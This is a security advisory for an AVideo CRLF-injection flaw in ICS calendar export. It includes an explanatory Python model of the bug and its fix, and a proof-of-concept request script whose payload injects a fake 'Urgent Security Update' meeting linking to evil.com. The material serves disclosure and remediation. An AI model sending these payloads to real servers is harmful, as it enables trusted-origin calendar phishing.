Security Vulnerability Report
CVE-2026-43882 CVSS 4.3 MEDIUM

CVE-2026-43882

Published: 2026-05-11 22:22:13
Last Modified: 2026-05-11 22:22:13

Description

WWBN AVideo is an open source video platform. In versions up to and including 29.0, the unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines — including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim's trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim's calendar after import. Commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 contains an updated fix.
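To make the mechanism concrete, the following Python model (an added example, not AVideo's code) reproduces the two escaping behaviours side by side: an escaper that only handles "," and ";" as the advisory describes, and an RFC 5545 TEXT escaper that also rewrites every CR/LF to the literal two characters backslash-n. A minimal VEVENT builder and a naive BEGIN/END:VEVENT reader then show what a calendar client would import from each. The calendar layout, the property names used and the sample "title" payload (taken from the PoC below) are constructed for illustration; the URL check for joinURL is an assumption about a sound fix, not a description of the project's commit.

```python
import re

# Constructed sample input: the attacker-controlled "title" from the PoC.
ATTACKER_TITLE = (
    "Meeting\r\nEND:VEVENT\r\nBEGIN:VEVENT\r\n"
    "SUMMARY:Urgent Security Update\r\n"
    "DESCRIPTION:Please click http://evil.com/update\r\n"
    "LOCATION:http://evil.com\r\nEND:VEVENT\r\nBEGIN:VEVENT"
)


def escape_vulnerable(value: str) -> str:
    """Models the behaviour the advisory describes for ICS::escape_string():
    only ',' and ';' are escaped, so CR/LF pass straight through."""
    return value.replace(",", "\\,").replace(";", "\\;")


def escape_text(value: str) -> str:
    """RFC 5545 TEXT escaping: backslash first, then ';' and ',', and every
    line break rewritten to the two characters backslash + 'n', so no raw
    CR or LF can end a property line early."""
    value = value.replace("\\", "\\\\").replace(";", "\\;").replace(",", "\\,")
    return re.sub(r"\r\n|\r|\n", lambda _: "\\n", value)


def require_single_line(uri: str) -> str:
    """URI-valued properties (URL:) are not TEXT and get no backslash escaping;
    the safe option (assumed fix, not the project's) is to refuse any control
    character outright."""
    if re.search(r"[\x00-\x1f\x7f]", uri):
        raise ValueError("control character in URI value")
    return uri


def build_ics(title: str, description: str, join_url: str, hardened: bool) -> str:
    """Assembles one VEVENT from the three request parameters (hypothetical
    structure, not AVideo's code), using the escaper selected by `hardened`."""
    esc = escape_text if hardened else escape_vulnerable
    url = require_single_line(join_url) if hardened else join_url
    lines = [
        "BEGIN:VCALENDAR",
        "VERSION:2.0",
        "PRODID:-//example//added example//EN",
        "BEGIN:VEVENT",
        "UID:example-1@example.invalid",
        "DTSTAMP:20260511T222213Z",
        "DTSTART:20260601T090000Z",
        "SUMMARY:" + esc(title),
        "DESCRIPTION:" + esc(description),
        "URL:" + url,
        "END:VEVENT",
        "END:VCALENDAR",
    ]
    return "\r\n".join(lines) + "\r\n"


def parse_events(ics: str) -> list:
    """Minimal ICS reader: one dict of properties per BEGIN/END:VEVENT pair.
    Deliberately naive (no line unfolding); it is enough to show how a client
    would see the injected events."""
    events, current = [], None
    for line in ics.split("\r\n"):
        if line == "BEGIN:VEVENT":
            current = {}
        elif line == "END:VEVENT":
            if current is not None:
                events.append(current)
            current = None
        elif current is not None and ":" in line:
            name, _, value = line.partition(":")
            current[name.upper()] = value
    return events


def event_summaries(hardened: bool) -> list:
    """SUMMARY of every event a client would import from the calendar built
    for the PoC parameters."""
    ics = build_ics(ATTACKER_TITLE, "Check this out", "http://example.com", hardened)
    return [ev.get("SUMMARY", "") for ev in parse_events(ics)]


def url_is_rejected(url: str) -> bool:
    """True if the hardened builder refuses the joinURL value."""
    try:
        build_ics("Meeting", "Check this out", url, hardened=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", event_summaries(hardened=False))
    print("hardened:  ", event_summaries(hardened=True))
```

With the vulnerable escaper the single request yields three events (the server's original, the forged "Urgent Security Update" meeting, and a stray third one opened by the trailing BEGIN:VEVENT); with TEXT escaping the whole payload stays inside one SUMMARY value and one event is produced. Note that escaping alone is not enough for URI properties such as URL:, which is why the hardened path rejects control characters in joinURL instead.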

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available yet (vulnStatus: Received).

Affected per the description: WWBN AVideo <= 29.0 (fixed by commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL vulnerable to CRLF injection
target_url = "http://<TARGET_HOST>/plugin/Scheduler/downloadICS.php"

# The payload uses CRLF to end the server's SUMMARY line early, close the
# server's VEVENT, and append a complete attacker-controlled VEVENT.
# Layout: original data + CRLF + END:VEVENT + CRLF + BEGIN:VEVENT + malicious
# properties + CRLF + END:VEVENT + CRLF + BEGIN:VEVENT. The trailing
# BEGIN:VEVENT re-opens an event so the server's own END:VEVENT still
# balances and the calendar remains well-formed.
payload_title = (
    "Meeting\r\nEND:VEVENT\r\nBEGIN:VEVENT\r\n"
    "SUMMARY:Urgent Security Update\r\n"
    "DESCRIPTION:Please click http://evil.com/update\r\n"
    "LOCATION:http://evil.com\r\n"
    "END:VEVENT\r\nBEGIN:VEVENT"
)

params = {
    "title": payload_title,
    "description": "Check this out",
    "joinURL": "http://example.com",
}

print(f"Sending request to {target_url}...")
response = requests.get(target_url, params=params, timeout=15)

if response.status_code == 200:
    print("Response received. Checking for injected content...")
    # requests percent-encodes CR/LF in the query string (%0D%0A); PHP decodes
    # them again before the value reaches escape_string(), so the injected
    # SUMMARY should appear verbatim in the returned .ics body.
    if "Urgent Security Update" in response.text and "BEGIN:VCALENDAR" in response.text:
        print("[+] PoC successful! Malicious ICS content generated.")
        print("[+] Content preview:")
        print(response.text[:500])
    else:
        print("[-] PoC failed. Injection not detected.")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

References

https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5
https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43882", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:12.803", "lastModified": "2026-05-11T22:22:12.803", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, the unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines — including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim's trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim's calendar after import. Commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv", "source": "[email protected]"}]}}